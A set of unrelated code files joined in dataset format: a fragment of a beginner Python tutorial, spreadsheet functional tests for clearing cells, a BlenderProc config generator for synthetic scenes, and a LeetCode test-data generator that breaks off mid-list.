multiline
comment '''
# A print function prints the code to the console, useful to learn and to debug
print('This is a print') # a comment can also be added after a funcion declaration or variable declaration.
print('you can print multiple things separated by a comma','like this and python will add a space in between')
# Section 2: Variables
var_1 = 5 # This is a int variable
var_2 = 'a' # There is a str variable, no need to invoke int or str as other languages.
var_3 = 1. # Theis is a float variable
print('Hello World!') # This is regular print
print('Hello','World!') # To append in a print on 2.X version a, is used and it adds a space between
print('Hello',end=" ") # The comma could be at the end
print('World!') # and the result will be the same
print('var_1', var_1) # It could be really helpful to print variables
print('var_2', var_2) # It doesnt care if it is a int str or float etc
print('var_3', var_3) # It doesnt care if it is a int str or float etc
print('var_1 is a ',type(var_1)) # Use 'type' to check which type of variable like int
print('var_2 is a ',type(var_2)) # or str
print('var_3 is a ',type(var_3)) # or float
# List, Dictionary, Tuples
print('List:')
L = [2, 5, 8, 'x', 'y'] # This is a list
print(L) # An easy way to print it is with print.
print(L[0]) # The first element starts with 0
print(L[-1]) # The last element is -1
print(L[0:3]) # This will select the elements 0, 1 and 2 (Warning!: not the 3)
print(L[2:4]) # This will select element 2 and 3
print(L[:-2]) # All elements except the last two
print(L[-2:]) # from the element [-2] until the end
L.append('z') #This is the Way to append elements to a list
print(L) # View the list with the last element appended.
print('Dictionary:')
D = {'k1': 123, 'k2': 456, 1:'v3'} # This is a Dictionary syntax key:value
print(D) # This is how to print a dictionary
print(D['k1']) # This is how to print a value with a given key
print ('Tuple:')
a, b = 1, 5 # The values can be assigned to each element separated with commas
print ('a',a) # value of a
print ('b',b) # value of b
| 4.59375 | 5 |
dirigible/fts/tests/test_2734_ClearCells.py | EnoX1/dirigible-spreadsheet | 168 | 12762233 | # Copyright (c) 2010 Resolver Systems Ltd.
# All Rights Reserved
#
try:
import unittest2 as unittest
except ImportError:
import unittest
from functionaltest import FunctionalTest
import key_codes
from textwrap import dedent
class Test_2734_ClearCells(FunctionalTest):
    """Functional tests: clearing cell contents via keyboard keys and via
    the usercode clear() API (single cells and cell ranges)."""

    def test_delete_key_clears_selected_cells(self):
        self.assert_key_deletes_cells(key_codes.DELETE)

    def test_backspace_key_clears_selected_cells(self):
        self.assert_key_deletes_cells(key_codes.BACKSPACE)

    def assert_key_deletes_cells(self, key_code):
        """Shared scenario: the given key clears a single cell and a range."""
        # * Harold logs in and creates a new sheet
        self.login_and_create_new_sheet()

        # * He enters some data in A1:A3
        self.enter_cell_text(1, 1, 'a1')
        self.enter_cell_text(1, 2, 'a2')
        self.enter_cell_text(1, 3, 'a3')
        self.wait_for_cell_value(1, 3, 'a3')

        # * He clicks on A1 and hits delete
        self.click_on_cell(1, 1)
        self.human_key_press(key_code)

        # * He sees the value in A1 disappear while the others remain
        self.wait_for_cell_value(1, 1, '')
        self.wait_for_cell_value(1, 2, 'a2')
        self.wait_for_cell_value(1, 3, 'a3')

        # * He selects the range a2:a3
        self.select_range_with_shift_click((1, 2), (1, 3))

        # He hits delete
        self.human_key_press(key_code)

        # * He sees that all the cells are now cleared
        self.wait_for_cell_value(1, 1, '')
        self.wait_for_cell_value(1, 2, '')
        self.wait_for_cell_value(1, 3, '')

    def test_delete_key_while_editing_still_does_what_it_should(self):
        """While editing a cell, DELETE removes the char after the cursor."""
        # * Harold logs in and creates a new sheet
        self.login_and_create_new_sheet()

        # * He enters three characters in A1
        self.open_cell_for_editing(1, 1)
        self.human_key_press(key_codes.NUMBER_1)
        self.human_key_press(key_codes.NUMBER_2)
        self.human_key_press(key_codes.NUMBER_3)

        # * He moves left twice
        self.human_key_press(key_codes.LEFT)
        self.human_key_press(key_codes.LEFT)

        # He hits delete
        self.human_key_press(key_codes.DELETE)

        # the middle character is now missing
        self.wait_for_cell_editor_content('13')

    def test_backspace_key_while_editing_still_does_what_it_should(self):
        """While editing a cell, BACKSPACE removes the char before the cursor."""
        # * Harold logs in and creates a new sheet
        self.login_and_create_new_sheet()

        # * He enters three characters in A1
        self.open_cell_for_editing(1, 1)
        self.human_key_press(key_codes.NUMBER_1)
        self.human_key_press(key_codes.NUMBER_2)
        self.human_key_press(key_codes.NUMBER_3)

        # * He moves left once
        self.human_key_press(key_codes.LEFT)

        # He hits backspace
        self.human_key_press(key_codes.BACKSPACE)

        # the middle character is now missing
        self.wait_for_cell_editor_content('13')

    def test_can_clear_cell_from_usercode(self):
        """worksheet.<cell>.clear() resets value, formula, formatted_value and error."""
        # * Harold logs in and creates a new sheet
        self.login_and_create_new_sheet()

        # * He enters some data in A1:A3
        self.enter_cell_text(1, 1, 'a1')
        self.enter_cell_text(1, 2, 'a2')
        self.enter_cell_text(1, 3, 'a3')
        self.wait_for_cell_value(1, 3, 'a3')

        # * He tries to use the clear() function from usercode on a cell
        #   and then tries to access some of the supposedly cleared attributes of the cell
        self.prepend_usercode(dedent('''
            worksheet.a1.error = 'harold puts a deliberate pointless error in'
            worksheet.a1.clear()
            worksheet.b1.formula = str(worksheet.a1.value)
            worksheet.b2.formula = str(worksheet.a1.formula)
            worksheet.b3.formula = str(worksheet.a1.formatted_value)
            worksheet.b4.formula = str(worksheet.a1.error)
        '''))

        # * He sees the value in a1 disappear
        self.wait_for_cell_value(1, 1, '')
        self.wait_for_cell_value(1, 2, 'a2')
        self.wait_for_cell_value(1, 3, 'a3')

        # * He sees his little investigations also produce the expected results
        self.wait_for_cell_value(2, 1, '<undefined>')
        self.wait_for_cell_value(2, 2, 'None')
        self.wait_for_cell_value(2, 3, '')
        self.wait_for_cell_value(2, 4, 'None')

    def test_can_clear_cell_range_from_usercode(self):
        """cell_range(...).clear() resets every cell in the range."""
        # * Harold logs in and creates a new sheet
        self.login_and_create_new_sheet()

        # * He enters some data in A1:A3
        self.enter_cell_text(1, 1, 'a1')
        self.enter_cell_text(1, 2, 'a2')
        self.enter_cell_text(1, 3, 'a3')
        self.wait_for_cell_value(1, 3, 'a3')

        # * He tries to use the clear() function from usercode on a cell range
        self.prepend_usercode(dedent('''
            worksheet.a1.error = 'harold puts a deliberate pointless error in'
            worksheet.a2.error = 'harold puts another deliberate pointless error in'
            worksheet.cell_range("a1:a2").clear()
            worksheet.b1.formula = str(worksheet.a1.value)
            worksheet.b2.formula = str(worksheet.a1.formula)
            worksheet.b3.formula = str(worksheet.a1.formatted_value)
            worksheet.b4.formula = str(worksheet.a1.error)
            worksheet.c1.formula = str(worksheet.a2.value)
            worksheet.c2.formula = str(worksheet.a2.formula)
            worksheet.c3.formula = str(worksheet.a2.formatted_value)
            worksheet.c4.formula = str(worksheet.a2.error)
        '''))

        # * He sees the value in a1 and a2 disappear
        self.wait_for_cell_value(1, 1, '')
        self.wait_for_cell_value(1, 2, '')
        self.wait_for_cell_value(1, 3, 'a3')

        # * He sees his little investigations also produce the expected results
        self.wait_for_cell_value(2, 1, '<undefined>')
        self.wait_for_cell_value(2, 2, 'None')
        self.wait_for_cell_value(2, 3, '')
        self.wait_for_cell_value(2, 4, 'None')
        self.wait_for_cell_value(3, 1, '<undefined>')
        self.wait_for_cell_value(3, 2, 'None')
        self.wait_for_cell_value(3, 3, '')
        self.wait_for_cell_value(3, 4, 'None')
| 2.671875 | 3 |
blenderproc/create_config.py | sriharshav/instr | 22 | 12762234 | """
Helper script to create config files for BlenderProc.
"""
import os
import yaml
import random
import numpy as np
import binascii
# these paths have to be manually set before creating a config
BLENDERPROC_ROOT = '' # /path/to/BlenderProc
SHAPENET_ROOT = '' # /path/to/ShapeNetCore.v2
SUNCG_ROOT = '' # /path/to/suncg
DEST = '' # /path/to/output_folder
def get_random_house_path():
    """Return the path of a randomly chosen SUNCG house.

    House paths are listed one per line in suncg_houses.txt (relative to
    SUNCG_ROOT); strip() removes the trailing newline of the chosen line.
    """
    with open(os.path.join(BLENDERPROC_ROOT, 'suncg_houses.txt'), 'r') as f:
        house_paths = f.readlines()
    return os.path.join(SUNCG_ROOT, random.choice(house_paths)).strip()
def get_base_cfg():
    """Load the BlenderProc base pipeline config as a dict.

    Uses ``yaml.safe_load``: calling ``yaml.load`` without an explicit Loader
    is deprecated since PyYAML 5.1 and a TypeError with PyYAML >= 6.  The base
    config is plain data, so the safe loader is sufficient.
    """
    with open(os.path.join(BLENDERPROC_ROOT, 'base_config.yaml'), 'r') as f:
        base_cfg = yaml.safe_load(f)
    return base_cfg
def get_random_obj_configs(n=10):
    """Build per-object BlenderProc module configs for ``n`` random ShapeNet objects.

    For each object a random scale in [0.1, 0.4] is drawn and six parallel
    config dicts are produced (loader, scale/material-randomize manipulator,
    material manipulator, on-surface pose sampler, physics positioning and a
    gravity-off manipulator).  Objects are tagged with ``cp_category_id = i+2``
    so later modules can select them individually.

    Returns:
        tuple of six lists (one entry per object), in the order:
        obj_configs, scale_configs, mat_configs, sample_configs,
        physic_configs, gravoff_configs.
    """
    obj_configs, scale_configs, mat_configs, sample_configs, physic_configs, gravoff_configs = [], [], [], [], [], []
    with open(os.path.join(BLENDERPROC_ROOT, 'shapenet_objects.txt'), 'r') as f:
        obj_paths = f.readlines()
    for i in range(n):
        scale = np.random.uniform(0.1, 0.4)
        # Coin flip (threshold 0.5) deciding whether UV maps are force-recalculated.
        recalculate_uv = np.random.uniform(0., 1.)
        # Loader: picks a random ShapeNet model path ([:-1] drops the newline).
        obj_base_cfg = {
            "module": "loader.CustomObjectLoader",
            "config": {
                "path": os.path.join(SHAPENET_ROOT, random.choice(obj_paths)[:-1]),
                "scale": [scale, scale, scale],
                "add_properties": {
                    "cp_object_to_scale": True,
                    "cp_sample_pose": True,
                    "cp_category_id": int(i+2),
                    "cp_coarse_grained_class": "selected_object",
                    "cp_type": "Object",
                    "cp_physics": True,
                    "cp_cc_texture": True
                },
            }
        }
        # Entity manipulator: applies the scale, a Solidify modifier and
        # random CC-texture materials to this object only.
        scale_base_cfg = {
            "module": "manipulators.EntityManipulator",
            "config": {
                "selector": {
                    "provider": "getter.Entity",
                    "conditions": {
                        "cp_category_id": int(i+2),
                    }
                },
                "scale": [scale, scale, scale],
                "cf_add_modifier": {
                    "name": "Solidify",
                    "thickness": 0.0025
                },
                "cf_randomize_materials": {
                    "randomization_level": 1.,
                    "materials_to_replace_with": {
                        "provider": "getter.Material",
                        "conditions": {
                            "cp_is_cc_texture": True
                        }
                    }
                },
            }
        }
        # Material manipulator: randomizes roughness/specular/displacement.
        mat_base_cfg = {
            "module": "manipulators.MaterialManipulator",
            "config": {
                "selector": {
                    "provider": "getter.Entity",
                    "conditions": {
                        "cp_category_id": int(i + 2),
                    }
                },
                "cf_set_Roughness": {
                    "provider": "sampler.Value",
                    "type": "float",
                    "min": 0.05,
                    "max": 0.5,
                },
                "cf_set_Specular": {
                    "provider": "sampler.Value",
                    "type": "float",
                    "min": 0.5,
                    "max": 1.0,
                },
                "cf_color_link_to_displacement": {
                    "provider": "sampler.Value",
                    "type": "float",
                    "min": 0.001,
                    "max": 0.15
                },
                "cf_set_Alpha": 1.0,
                "mode": "once_for_each"
            }
        }
        # Pose sampler: drops the object above the entity named "selected_table".
        sampler_base_cfg = {
            "module": "object.OnSurfaceSampler",
            "config": {
                "objects_to_sample": {
                    "provider": "getter.Entity",
                    "conditions": {
                        "cp_category_id": int(i+2)
                    }
                },
                "surface": {
                    "provider": "getter.Entity",
                    "index": 0,
                    "conditions": {
                        "name": "selected_table"
                    }
                },
                "pos_sampler": {
                    "provider": "sampler.UpperRegionSampler",
                    "to_sample_on": {
                        "provider": "getter.Entity",
                        "index": 0,
                        "conditions": {
                            "name": "selected_table"
                        }
                    },
                    "min_height": 1,
                    "max_height": 4,
                    "face_sample_range": [0.4, 0.6],
                    "use_ray_trace_check": False,
                },
                "min_distance": 0.1,
                "max_distance": 1.5,
                "rot_sampler": {
                    "provider": "sampler.Uniform3d",
                    "min": [0, 0, 0],
                    "max": [6.28, 6.28, 6.28]
                }
            }
        }
        # Short physics simulation so objects settle on the surface.
        physics_base_cfg = {
            "module": "object.PhysicsPositioning",
            "config": {
                "min_simulation_time": 0.5,
                "max_simulation_time": 2,
                "check_object_interval": 1,
            }
        }
        # Disables physics again after settling, freezing the object in place.
        grav_off_cfg = {
            "module": "manipulators.EntityManipulator",
            "config": {
                "selector": {
                    "provider": "getter.Entity",
                    "conditions": {
                        "cp_category_id": int(i + 2),
                    }
                },
                "cp_physics": False,
            }
        }
        # Cylinder UV mapping, shared coin flip for forced recalculation.
        scale_base_cfg["config"]["cf_add_uv_mapping"] = {
            "projection": "cylinder",
            "forced_recalc_of_uv_maps": True if recalculate_uv > 0.5 else False
        }
        mat_base_cfg["config"]["cf_add_uv_mapping"] = {
            "projection": "cylinder",
            "forced_recalc_of_uv_maps": True if recalculate_uv > 0.5 else False
        }
        obj_configs.append(obj_base_cfg)
        scale_configs.append(scale_base_cfg)
        mat_configs.append(mat_base_cfg)
        sample_configs.append(sampler_base_cfg)
        physic_configs.append(physics_base_cfg)
        gravoff_configs.append(grav_off_cfg)
    return obj_configs, scale_configs, mat_configs, sample_configs, physic_configs, gravoff_configs
def create_config():
    """Assemble one randomized BlenderProc run config and write it to disk.

    Starts from the base config, sets camera intrinsics, inserts per-object
    modules, picks a random SUNCG house, randomizes house materials, and
    writes the result under a fresh random directory in DEST.

    Returns:
        str: path of the written config.yaml.

    NOTE(review): ``mat_config`` is unpacked in the loop below but never
    inserted into the module list — confirm whether the material manipulator
    was dropped intentionally.  Inserting at fixed indices 6..10 on every
    iteration also reverses the per-object module order; presumably the
    pipeline is order-insensitive here — verify.
    """
    base_cfg = get_base_cfg()
    # Stereo camera intrinsics (module index 8 in the base config).
    baseline = 0.065
    focal_length_x = 541.14
    focal_length_y = 541.14
    base_cfg['modules'][8]['config']['intrinsics']['interocular_distance'] = baseline
    base_cfg['modules'][8]['config']['intrinsics']['cam_K'] = [focal_length_x, 0.0, 320.0, 0.0, focal_length_y, 240.0, 0.0, 0.0, 1.0]
    # add objects
    num_objs = np.random.randint(5, 12)
    obj_configs, scale_configs, mat_configs, sample_configs, physic_configs, gravoff_configs = get_random_obj_configs(n=num_objs)
    for obj_config, scale_config, mat_config, sample_config, physics_config, gravoff_config in zip(obj_configs, scale_configs, mat_configs, sample_configs, physic_configs, gravoff_configs):
        base_cfg['modules'].insert(6, obj_config)
        base_cfg['modules'].insert(7, scale_config)
        base_cfg['modules'].insert(8, sample_config)
        base_cfg['modules'].insert(9, physics_config)
        base_cfg['modules'].insert(10, gravoff_config)
    # set house path
    base_cfg['modules'][1]['config']['path'] = get_random_house_path()
    # replace house with cctextures
    house_cc_texture_config = {
        "module": "manipulators.EntityManipulator",
        "config": {
            "selector": {
                "provider": "getter.Entity",
                "conditions": {
                    "type": "MESH"
                }
            },
            "cf_randomize_materials": {
                "randomization_level": 0.4,
                "materials_to_replace_with": {
                    "provider": "getter.Material",
                    "random_samples": 1,
                    "conditions": {
                        "cp_is_cc_texture": True  # this will return one random loaded cc textures
                    }
                }
            }
        }
    }
    base_cfg['modules'].insert(4, house_cc_texture_config)
    # set output dir: 20 random bytes, hex-encoded, used as a unique run name.
    output_prefix = os.urandom(20)
    output_prefix = binascii.hexlify(output_prefix)
    output_prefix = str(output_prefix)[2:-1]
    output_path = os.path.join(DEST, output_prefix)
    os.makedirs(output_path)
    base_cfg['modules'][0]['config']['global']['output_dir'] = output_path
    with open(os.path.join(DEST, output_prefix + '/config.yaml'), 'w') as f:
        yaml.dump(base_cfg, f)
    return os.path.join(DEST, output_prefix + '/config.yaml')
if __name__ == '__main__':
path = create_config()
print(path)
| 2.3125 | 2 |
test/generators/wiggle_sort_ii.py | yanqd0/LeetCode | 0 | 12762235 | <filename>test/generators/wiggle_sort_ii.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Column header(s) for the CSV fixture produced by utils.generate_csv below.
FIELDS = ['nums']
ROWS = [
([1]),
([1, 2]),
([1, 2, 1]),
([1, 1, 2]),
([3, 2, 4]),
([1, 5, 1, 1, 6, 4]),
([1, 3, 2, 2, 3, 1]),
([1, 1, 2, 2, 2, 1]),
([1, 1, 1, 1, 2, 2, 2]),
# ([1, 1, 1, 2, 2, 2, 2]),
([4, 5, 5, 6]),
([3, 3, 3, 2, 2, 2, 3, 2, 1, 1, 2, 1, 2, 3, 3, 3, 1, 2]),
([
9, 4, 8, 2, 5, 10, 4, 4, 2, 7, 8, 8, 10, 4, 10, 10, 2, 6, 4, 9, 3, 5,
9, 8, 3, 3, 10, 3, 5, 7, 2, 9, 10, 1, 9, 7, 9, 8, 8, 7, 1, 3, 9, 5, 2,
1, 9, 3, 4, 6, 9, 5, 7, 10, 3, 10, 3, 9, 1, 2, 1, 7, 3, 4, 2, 8, 7, 4,
4, 7, 10, 2, 4, 1, 3, 7, 9, 8, 9, 6, 3, 6, 6, 1, 6, 6, 3, 9, 1, 5, 9,
2, 3, 10, 10, 3, 2, 10, 9, 6, 5, 3, 4, 5, 8, 7, 8, 8, 6, 3, 10, 10, 5,
8, 9, 10, 2, 3, 8, 7, 4, 10, 9, 10, 8, 8, 9, 9, 3, 10, 8, 3, 8, 3, 3,
4, 1, 6, 4, 5, 5, 4, 8, 3, 3, 5, 3, 3, 1, 2, 3, 4, 6, 8, 1, 9, 8, 9,
10, 8, 2, 10, 8, 9, 8, 8, 2, 9, 8, 5, 1, 9, 2, 3, 2, 4, 6, 10, 9, 10,
4, 6, 2, 5, 2, 10, 8, 4, 5, 3, 8, 7, 9, 1, 10, 5, 8, 10, 8, 2, 6, 10,
1, 3, 7, 7, 6, 5, 4, 5, 7, 2, 5, 9, 9, 5, 7, 1, 5, 4, 3, 2, 3, 8, 9, 3,
7, 6, 2, 5, 6, 6, 3, 7, 7, 6, 4, 1, 2, 1, 9, 8, 4, 7, 10, 3, 4, 8, 4,
1, 1, 3, 4, 6, 9, 10, 5, 8, 1, 3, 8, 1, 1, 1, 6, 3, 9, 7, 1, 9, 8, 4,
10, 6, 1, 6, 3, 5, 8, 9, 2, 4, 6, 8, 5, 5, 3, 9, 4, 8, 9, 1, 2, 9, 4,
10, 10, 5, 5, 5, 9, 1, 3, 2, 9, 2, 10, 9, 2, 9, 2, 7, 4, 9, 8, 2, 10,
6, 7, 1, 9, 1, 4, 3, 6, 6, 1, 1, 4, 6, 4, 5, 6, 8, 7, 3, 3, 8, 2, 1,
10, 1, 5, 4, 2, 7, 7, 2, 5, 9, 1, 2, 8, 3, 2, 4, 1, 6, 6, 7, 3, 2, 3,
10, 6, 10, 2, 7, 7, 5, 8, 8, 1, 4, 9, 1, 1, 6, 9, 6, 10, 8, 1, 10, 8,
1, 2, 6, 5, 5, 2, 6, 8, 7, 6, 9, 7, 9, 5, 10, 3, 1, 4, 4, 7, 7, 10, 8,
3, 6, 5, 9, 1, 10, 2, 3, 8, 6, 1, 7, 4, 1, 4, 3, 4, 6, 6, 5, 7, 3, 6,
10, 10, 7, 5, 2, 4, 6, 6, 5, 6, 2, 4, 5, 9, 8, 9, 9, 10, 2, 5, 6, 9, 7,
8, 9, 9, 6, 4, 8, 7, 8, 4, 7, 9, 2, 8, 4, 5, 1, 5, 2, 6, 3, 8, 9, 6, 8,
3, 2, 7, 3, 1, 8, 2, 4, 9, 4, 2, 1, 1, 7, 3, 8, 1, 9, 9, 8, 10, 8, 6,
5, 10, 9, 6, 10, 8, 2, 7, 2, 8, 10, 7, 1, 2, 6, 2, 8, 8, 4, 4, 7, 3, 4,
7, 9, 9, 2, 5, 4, 5, 5, 2, 8, 6, 10, 5, 5, 10, 9, 7, 10, 2, 5, 7, 8,
10, 2, 8, 10, 2, 9, 5, 9, 9, 6, 9, 1, 4, 10, 2, 2, 10, 8, 10, 1, 7, 3,
6, 8, 3, 3, 7, 9, 9, 3, 9, 6, 2, 5, 2, 8, 5, 5, 6, 4, 6, 1, 1, 6, 8, 7,
3, 8, 4, 9, 8, 7, 7, 4, 10, 8, 8, 9, 4, 8, 2, 10, 6, 10, 7, 6, 6, 2, 5,
2, 5, 5, 2, 8, 8, 6, 6, 7, 4, 7, 1, 8, 2, 6, 10, 5, 10, 8, 4, 4, 8, 1,
6, 9, 5, 1, 8, 6, 9, 5, 10, 6, 10, 8, 8, 9, 4, 1, 10, 1, 10, 8, 4, 4,
5, 2, 10, 2, 1, 6, 2, 8, 10, 10, 2, 2, 6, 7, 10, 1, 5, 1, 5, 2, 2, 1,
3, 6, 1, 4, 5, 3, 2, 1, 8, 1, 7, 1, 6, 7, 7, 4, 2, 10, 2, 6, 4, 2, 2,
4, 9, 7, 5, 7, 4, 3, 10, 7, 9, 4, 3, 3, 3, 10, 8, 3, 7, 7, 8, 8, 6, 4,
7, 4, 6, 10, 4, 7, 10, 9, 10, 8, 9, 5, 2, 9, 9, 1, 6, 9, 7, 10, 10, 8,
8, 2, 7, 7, 6, 9, 6, 3, 8, 8, 2, 2, 5, 9, 5, 1, 10, 4, 1, 9, 9, 2, 5,
3, 7, 7, 4, 3, 8, 7, 5, 8, 9, 4, 7, 7, 6, 5, 1, 10, 1, 5, 5, 8, 1, 1,
7, 6, 8, 9, 4, 9, 2, 5, 9, 10, 6, 8, 4, 9, 2, 6, 7, 6, 8, 6, 3, 8, 1,
8, 1, 1, 7, 6, 3, 5, 8, 3, 3, 4, 9, 4, 3, 5, 7, 9, 2, 5, 10, 10, 1, 5,
10, 6, 10, 4, 9, 6, 7, 10, 8, 6, 5, 4, 7, 5, 6, 2, 2, 3, 8, 5, 10, 9,
9, 6, 1, 10, 1, 8, 5, 2, 6, 7, 9, 4, 5, 6, 4, 8, 1, 5, 2, 5, 7, 7, 9,
5, 9, 4, 6, 10, 7, 7, 4, 9, 1, 2, 4, 4, 8, 3, 6, 6, 5, 5, 4, 8, 3, 4,
9, 8, 8, 3, 1, 10, 7, 5, 5, 2, 1, 3, 1, 4, 3, 8, 7, 9, 2, 1, 6, 2, 5,
7, 6, 6, 8, 10, 1, 2, 10, 1, 7, 6, 10, 6, 8, 1, 5, 2, 5, 3, 7, 1, 6, 4,
2, 10, 5, 3, 3, 2, 10, 9, 4, 2, 10, 4, 3, 1, 9, 9, 5, 2, 1, 2, 7, 6, 4,
10, 1, 6, 9, 3, 6, 2, 1, 3, 3, 1, 6, 9, 9, 6, 4, 8, 3, 3, 8, 8, 7, 8,
9, 6, 9, 5, 7, 4, 10, 2, 5, 8, 6, 5, 2, 10, 6, 7, 5, 4, 8, 3, 9, 6, 3,
10, 8, 3, 1, 4, 10, 10, 3, 7, 5, 2, 8, 8, 1, 4, 8, 9, 4, 8, 6, 2, 9, 4,
8, 5, 1, 6, 1, 9, 7, 7, 5, 10, 6, 7, 8, 9, 2, 10, 1, 2, 8, 9, 2, 4, 3,
8, 3, 5, 4, 9, 9, 10, 6, 7, 5, 5, 1, 2, 4, 1, 9, 10, 8, 8, 5, 6, 4, 9,
5, 4, 3, 5, 7, 2, 2, 8, 7, 8, 7, 8, 4, 4, 9, 1, 5, 5, 4, 3, 6, 1, 3, 1,
3, 6, 5, 3, 10, 5, 7, 8, 4, 2, 6, 6, 4, 8, 1, 8, 6, 5, 1, 4, 8, 5, 10,
8, 10, 4, 4, 5, 3, 8, 3, 2, 5, 10, 2, 8, 8, 4, 2, 1, 8, 8, 8, 6, 2, 6,
5, 6, 7, 7, 1, 3, 3, 8, 7, 9, 9, 10, 9, 7, 2, 8, 10, 9, 3, 8, 2, 9, 1,
6, 3, 5, 3, 10, 1, 6, 10, 4, 9, 4, 1, 3, 1, 7, 8, 10, 6, 4, 5, 2, 4, 7,
10, 9, 8, 6, 8, 1, 1, 8, 2, 4, 5, 10, 9, 6, 3, 6, 2, 8, 7, 3, 8, 1, 10,
5, 5, 3, 9, 6, 8, 7, 1, 1, 2, 8, 5, 5, 2, 3, 3, 10, 6, 3, 5, 2, 4, 10,
7, 6, 5, 5, 10, 6, 10, 2, 4, 4, 9, 1, 4, 10, 5, 5, 10, 4, 10, 3, 1, 1,
9, 9, 3, 6, 9, 8, 6, 3, 8, 3, 5, 1, 2, 2, 8, 5, 9, 10, 10, 8, 3, 7, 3,
10, 6, 7, 7, 1, 1, 1, 7, 10, 6, 9, 2, 2, 4, 10, 3, 2, 4, 7, 10, 6, 1,
8, 8, 4, 2, 3, 6, 9, 5, 7, 7, 8, 7, 1, 2, 10, 4, 2, 1, 2, 3, 8, 6, 7,
4, 10, 6, 6, 3, 3, 5, 2, 7, 8, 9, 6, 10, 5, 7, 4, 2, 4, 9, 1, 2, 6, 10,
7, 1, 1, 7, 8, 8, 10, 4, 2, 3, 9, 8, 1, 1, 5, 5, 1, 3, 8, 3, 5, 10, 10,
6, 2, 3, 9, 1, 1, 9, 8, 9, 9, 1, 7, 9, 5, 1, 1, 1, 5, 4, 2, 7, 3, 10,
10, 1, 5, 7, 10, 10, 5, 2, 2, 7, 6, 8, 7, 10, 8, 8, 2, 8, 3, 3, 1, 5,
5, 7, 3, 6, 7, 8, 1, 1, 5, 8, 10, 1, 3, 8, 7, 7, 7, 8, 3, 3, 2, 2, 8,
7, 1, 1, 8, 10, 6, 2, 1, 2, 8, 9, 8, 10, 10, 6, 9, 4, 9, 5, 1, 2, 10,
3, 4, 4, 10, 8, 3, 1, 10, 8, 6, 4, 9, 5, 4, 9, 4, 6, 9, 10, 7, 8, 6, 8,
2, 6, 8, 3, 9, 8, 3, 9, 8, 5, 8, 6, 10, 2, 2, 8, 9, 9, 2, 8, 6, 5, 4,
2, 5, 6, 2, 8, 2, 4, 3, 4, 5, 10, 9, 2, 2, 1, 5, 9, 5, 9, 7, 10, 5, 5,
4, 7, 10, 7, 1, 4, 2, 3, 2, 7, 6, 9, 7, 9, 2, 9, 7, 1, 9, 6, 10, 7, 7,
6, 10, 9, 6, 3, 10, 9, 6, 6, 1, 9, 3, 7, 8, 10, 4, 5, 8, 8, 8, 1, 5, 6,
5, 1, 7, 8, 2, 3, 4, 4, 8, 2, 2, 9, 10, 1, 2, 6, 8, 9, 3, 3, 2, 6, 4,
10, 10, 4, 4, 2, 9, 5, 9, 7, 5, 3, 1, 2, 9, 5, 3, 3, 3, 7, 5, 4, 4, 10,
10, 3, 1, 10, 8, 3, 4, 2, 9, 4, 6, 5, 2, 6, 9, 10, 3, 9, 5, 2, 4, 6, 2,
10, 4, 3, 3, 5, 2, 5, 6, 9, 4, 3, 3, 3, 7, 4, 4, 7, 9, 8, 1, 10, 6, 6,
7, 2, 1, 6, 3, 1, 10, 5, 10, 7, 5, 7, 8, 3, 10, 9, 10, 7, 1, 10, 5, 10,
6, 5, 9, 8, 1, 3, 8, 4, 10, 3, 2, 4, 2, 3, 6, 6, 4, 5, 10, 7, 5, 9, 5,
3, 5, 5, 5, 1, 7, 6, 3, 8, 6, 10, 3, 9, 2, 9, 7, 10, 1, 2, 10, 1, 3, 5,
9, 9, 4, 9, 2, 5, 5, 8, 4, 7, 6, 4, 10, 1, 9, 9, 1, 7, 7, 8, 8, 10, 3,
8, 10, 5, 9, 10, 10, 7, 9, 10, 8, 2, 9, 2, 5, 8, 6, 4, 9, 4, 8, 8, 3,
1, 8, 7, 10, 5, 2, 1, 9, 1, 8, 8, 4, 9, 1, 6, 3, 5, 6, 9, 3, 5, 6, 8,
2, 8, 9, 6, 5, 2, 3, 8, 10, 10, 5, 3, 1, 3, 9, 8, 9, 6, 8, 4, 3, 10, 9,
3, 3, 10, 3, 5, 10, 9, 9, 1, 7, 9, 1, 2, 1, 3, 10, 7, 3, 9, 7, 3, 2, 1,
6, 3, 9, 10, 1, 4, 4, 2, 8, 5, 8, 7, 9, 2, 10, 5, 7, 6, 6, 6, 9, 7, 3,
8, 7, 4, 4, 1, 8, 1, 7, 5, 7, 6, 1, 5, 3, 2, 3, 8, 2, 5, 9, 8, 9, 2, 4,
4, 7, 9, 8, 10, 10, 6, 1, 9, 6, 10, 3, 1, 8, 3, 4, 8, 1, 6, 7, 3, 3, 4,
8, 8, 8, 4, 1, 8, 7, 5, 10, 4, 9, 7, 2, 6, 5, 8, 10, 2, 8, 7, 9, 5, 6,
3, 2, 9, 9, 1, 1, 3, 9, 6, 4, 2, 1, 7, 2, 5, 1, 5, 4, 9, 5, 3, 2, 1, 2,
2, 6, 2, 7, 8, 7, 6, 4, 4, 6, 9, 8, 7, 2, 2, 9, 7, 6, 3, 9, 1, 1, 10,
2, 9, 5, 1, 1, 3, 7, 1, 2, 10, 10, 9, 2, 8, 1, 9, 6, 8, 2, 6, 1, 9, 7,
10, 6, 2, 2, 1, 8, 9, 3, 2, 10, 5, 7, 9, 1, 6, 7, 1, 1, 3, 4, 1, 7, 10,
1, 2, 1, 7, 6, 7, 6, 6, 1, 4, 3, 7, 2, 4, 6, 9, 6, 1, 1, 1, 4, 2, 10,
2, 8, 10, 2, 5, 4, 4, 10, 7, 7, 2, 7, 5, 5, 2, 9, 8, 1, 3, 5, 9, 5, 3,
9, 10, 8, 7, 3, 3, 7, 1, 9, 1, 4, 10, 5, 10, 1, 1, 5, 1, 5, 10, 9, 6,
10, 6, 10, 3, 5, 7, 3, 2, 1, 6, 9, 3, 2, 8, 4, 10, 5, 2, 6, 7, 7, 9, 3,
6, 2, 10, 2, 3, 7, 10, 6, 9, 1, 3, 4, 8, 9, 7, 3, 1, 10, 3, 6, 6, 5, 2,
5, 4, 8, 5, 8, 2, 1, 4, 1, 3, 7, 1, 5, 7, 6, 5, 1, 4, 10, 9, 8, 1, 9,
6, 3, 6, 3, 7, 8, 5, 3, 7, 6, 6, 8, 2, 10, 5, 2, 3, 10, 6, 6, 5, 3, 9,
7, 4, 4, 1, 7, 7, 10, 10, 6, 9, 6, 6, 1, 6, 7, 1, 7, 1, 9, 3, 8, 10, 8,
10, 4, 2, 2, 5, 2, 6, 4, 9, 4, 9, 1, 8, 7, 1, 5, 8, 1, 1, 4, 10, 8, 10,
